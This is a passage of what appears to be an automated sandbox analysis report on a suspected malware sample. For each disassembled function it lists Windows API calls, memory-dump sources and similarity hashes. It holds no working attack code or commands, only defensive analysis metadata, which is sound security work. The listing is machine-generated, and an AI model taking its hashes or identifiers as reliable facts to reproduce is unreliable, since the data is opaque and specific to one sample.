                                                                                                • Part of subcall function 00DC960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DC8199,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?), ref: 00DC961B
                                                                                                • Part of subcall function 00DC960C: lstrcpyW.KERNEL32(00000000,?,?,00DC8199,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC9641
                                                                                                • Part of subcall function 00DC960C: lstrcmpiW.KERNEL32(00000000,?,00DC8199,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?), ref: 00DC9672
                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC81B2
                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC81D8
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC8213
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: ebf1520fbc21690535bd0630060cc10ffab17774fa3fbb356e961deb2e4bac4a
                                                                                              • Instruction ID: 074355fce05f9583cb01a3ac8cc5cb2b3af494217bc612b1bbb1135393e686a6
                                                                                              • Opcode Fuzzy Hash: ebf1520fbc21690535bd0630060cc10ffab17774fa3fbb356e961deb2e4bac4a
                                                                                              • Instruction Fuzzy Hash: 1611D63A200342ABCB145F34D859F7AB7AAFF95350B54402EF946CB250EF319811D774
                                                                                              Function 00DF8621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00DF866A
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DF8689
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DF86A1
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DDC10A,00000000), ref: 00DF86CA
                                                                                                • Part of subcall function 00D62441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D62452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID:
                                                                                              • API String ID: 847901565-0
                                                                                              • Opcode ID: 70df3799ccbabfb0bb1c9e4cebf550c845bcceed78fa32d8c619d0fc0ce76e33
                                                                                              • Instruction ID: ae19f49eb417525be87bf0ce31cb365760b61c6d5d439e6ae419c1e4853a7209
                                                                                              • Opcode Fuzzy Hash: 70df3799ccbabfb0bb1c9e4cebf550c845bcceed78fa32d8c619d0fc0ce76e33
                                                                                              • Instruction Fuzzy Hash: 9A11753250021D9FCB109F29DC08A763BA5EB45374F168728FE39DB2E0DB309911EB61
                                                                                              Function 00D92099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e160d1c3fcaad10974a759c1875b8beb6eb699778c1c9aae68cf3935481e30b2
                                                                                              • Instruction ID: 390e670fa71a631f966fa7fb5445b813c444a26ddafe5969519f088a1278f5eb
                                                                                              • Opcode Fuzzy Hash: e160d1c3fcaad10974a759c1875b8beb6eb699778c1c9aae68cf3935481e30b2
                                                                                              • Instruction Fuzzy Hash: D901D6B22093157EFF2126786CC1F37670EDF423B8B350325F621A12D5DA708C5085B0
                                                                                              Function 00DC22B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00DC22D7
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DC22E9
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DC22FF
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DC231A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: cae3bbaabb26e33395b8b2a46ec1388b866eced09cf96e4a42719886e16510b6
                                                                                              • Instruction ID: 375d164c8ec9386c0b994d1fa08eac5c1ef41ecca1462f756061831cb43481a4
                                                                                              • Opcode Fuzzy Hash: cae3bbaabb26e33395b8b2a46ec1388b866eced09cf96e4a42719886e16510b6
                                                                                              • Instruction Fuzzy Hash: 9F110C36900219FFDB11DBA5CD85FADFB78EB08750F200095EA01B7290D6716E10DBA4
                                                                                              Function 00DFA852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D62441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D62452
                                                                                              • GetClientRect.USER32(?,?), ref: 00DFA890
                                                                                              • GetCursorPos.USER32(?), ref: 00DFA89A
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DFA8A5
                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00DFA8D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4127811313-0
                                                                                              • Opcode ID: b88f1dd5148b959ec7388ef33076ed67f8f2e327f3c6a01533df8ca1f747aff2
                                                                                              • Instruction ID: 82cc6f162e7212186c12107dca308648d8a57becd3bcc5f11d255560d60dfda6
                                                                                              • Opcode Fuzzy Hash: b88f1dd5148b959ec7388ef33076ed67f8f2e327f3c6a01533df8ca1f747aff2
                                                                                              • Instruction Fuzzy Hash: 391136B190011DEFDF14DF98D8499FE7BB9FB05340F028456EA15E6250D770AA82CBB2
                                                                                              Function 00DCEA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00DCEA29
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00DCEA5C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DCEA72
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DCEA79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2880819207-0
                                                                                              • Opcode ID: e2bee6fb99b693164871978e644ba1cff0db0df855d5612b7f6155812146482f
                                                                                              • Instruction ID: b3a06dcaf4c5d551c6c363437a4585b3422c7c9747c4bcf66dfc35b7f1842240
                                                                                              • Opcode Fuzzy Hash: e2bee6fb99b693164871978e644ba1cff0db0df855d5612b7f6155812146482f
                                                                                              • Instruction Fuzzy Hash: 1D11A9B590035AAFC711AB689C09FAE7FAEAB45310F14825AF515E3290D674890487B1
                                                                                              Function 00DF8773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DF8792
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DF87AA
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DF87CE
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DF87E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: e7df401eda2b51700dcca2c696db76f70e36e58efcdc639f2043e881256195d7
                                                                                              • Instruction ID: db75f07855f0cc139e7642ca186ced2391097d5f65ded7ea87825bd18e39e020
                                                                                              • Opcode Fuzzy Hash: e7df401eda2b51700dcca2c696db76f70e36e58efcdc639f2043e881256195d7
                                                                                              • Instruction Fuzzy Hash: 8B1140B9D0024DAFDB41DFA8D884AEEBBB5FB08314F108166E915E3210D735AA54DF61
                                                                                              Function 00D62150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 00D6216C
                                                                                              • SetTextColor.GDI32(?,?), ref: 00D62176
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00D62189
                                                                                              • GetStockObject.GDI32(00000005), ref: 00D62191
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ModeObjectStockText
                                                                                              • String ID:
                                                                                              • API String ID: 4037423528-0
                                                                                              • Opcode ID: 6861b2d0e7a93015461e9b46265171fb6cbe31243f0e3561791c9f3737252f83
                                                                                              • Instruction ID: d2f054f6184a50e00b8a96a2af941e82553dc5dc0c2170a1899b8cfc12645620
                                                                                              • Opcode Fuzzy Hash: 6861b2d0e7a93015461e9b46265171fb6cbe31243f0e3561791c9f3737252f83
                                                                                              • Instruction Fuzzy Hash: F8E03031644740AADB215B74AC097E87B23AB12336F18C215F6BA881E0C3724640DB30
                                                                                              Function 00DBEBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00DBEBD6
                                                                                              • GetDC.USER32(00000000), ref: 00DBEBE0
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DBEC00
                                                                                              • ReleaseDC.USER32(?), ref: 00DBEC21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 5892c0575da12f0b79b066996cdab2c811222ba013ee2221f30df82999b583dc
                                                                                              • Instruction ID: ac3bd692290c88698ca4f43a7780db61425f9e8f7a4c09115d3d7ed7bc408b6f
                                                                                              • Opcode Fuzzy Hash: 5892c0575da12f0b79b066996cdab2c811222ba013ee2221f30df82999b583dc
                                                                                              • Instruction Fuzzy Hash: 85E075B5900209EFCB51AFA09808A6DBBB6EB48311F15C44AE94AE3351DB389941EF64
                                                                                              Function 00DBEBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00DBEBEA
                                                                                              • GetDC.USER32(00000000), ref: 00DBEBF4
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DBEC00
                                                                                              • ReleaseDC.USER32(?), ref: 00DBEC21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 95c44cf1303383c5443ec100b0b7468821331a36dec4987fc45b0ae4966496fe
                                                                                              • Instruction ID: ffb805730e420c42c4521cab588d10fc9edbf6294138ba416d5d5df1b8f806ae
                                                                                              • Opcode Fuzzy Hash: 95c44cf1303383c5443ec100b0b7468821331a36dec4987fc45b0ae4966496fe
                                                                                              • Instruction Fuzzy Hash: 34E075B5900209EFCB519FA09808A6DBBB6AB48315B15C449E949E3350DB389941DF60
                                                                                              Function 00D7A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: ae100e6a79c19e93a2698b8a58107149fafcfe6343f79538e554a3aeb1ec7316
                                                                                              • Instruction ID: 4bfcfb1b9051762b83c744a0983022c7407e28ea197507841b2a2ea474e100f5
                                                                                              • Opcode Fuzzy Hash: ae100e6a79c19e93a2698b8a58107149fafcfe6343f79538e554a3aeb1ec7316
                                                                                              • Instruction Fuzzy Hash: 91513031504246DFCF15DF28C480AFE7BAAEF55310F688059E9969B290EB30DD92DB71
                                                                                              Function 00DE60A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                              • String ID: CALLARGARRAY
                                                                                              • API String ID: 157775604-1150593374
                                                                                              • Opcode ID: d6a563fd970068c4476388412da33d3a669d048e4875e1aff0e38d2b3ab0ccb9
                                                                                              • Instruction ID: ebefddd9b4ed4e43853ae119bdfafc26c77489ab2a50677a836bd3e76baa8c69
                                                                                              • Opcode Fuzzy Hash: d6a563fd970068c4476388412da33d3a669d048e4875e1aff0e38d2b3ab0ccb9
                                                                                              • Instruction Fuzzy Hash: CF419071A002199FCB05EFAAC8859BEBBB5EF69360F144129E506A7352E770DD81CB70
                                                                                              Function 00DF406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D67759
                                                                                                • Part of subcall function 00D6771B: GetStockObject.GDI32(00000011), ref: 00D6776D
                                                                                                • Part of subcall function 00D6771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D67777
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DF40D9
                                                                                              • GetSysColor.USER32(00000012), ref: 00DF40F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 18313ac93b9c7ffa03dd0fdac8787338af04ebcc59985f2ffd9f70725d6e6e19
                                                                                              • Instruction ID: 99bd1ab15facd006267c8130666393b059ad94d9b162fdb51f1746cbbf83d404
                                                                                              • Opcode Fuzzy Hash: 18313ac93b9c7ffa03dd0fdac8787338af04ebcc59985f2ffd9f70725d6e6e19
                                                                                              • Instruction Fuzzy Hash: F811077261020DAFDB01DFA8CC46AFA7BB9FB08314F058929FA55E3250E775E851DB60
                                                                                              Function 00DC256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DC25DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 33cfa89c521252d7314a4c6c5eddf432ba197833230165fd828fdccd385bd0e9
                                                                                              • Instruction ID: b54eac5d5fa4d2f571feb60007bec677fe9856d4236017fc52cf52867bc17deb
                                                                                              • Opcode Fuzzy Hash: 33cfa89c521252d7314a4c6c5eddf432ba197833230165fd828fdccd385bd0e9
                                                                                              • Instruction Fuzzy Hash: D301D871610226ABCB14EB64CC61EFF7765EF56320B08061EB863973D6EE3098089670
                                                                                              Function 00DC2468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DC24D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: e0f600dbc2ec86f4c1e8c2bfbd94b6705988ada8e585c1e409d8fd085895ffb5
                                                                                              • Instruction ID: 2580a72e400217a4144d0cded95dcb37be48ccdb5b107e9d101823de5f9e9102
                                                                                              • Opcode Fuzzy Hash: e0f600dbc2ec86f4c1e8c2bfbd94b6705988ada8e585c1e409d8fd085895ffb5
                                                                                              • Instruction Fuzzy Hash: D901A77164410AABDF28EBA0C861FFFB7A9DF65350F14001EA542A72C2DA609E08C671
                                                                                              Function 00DC24EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
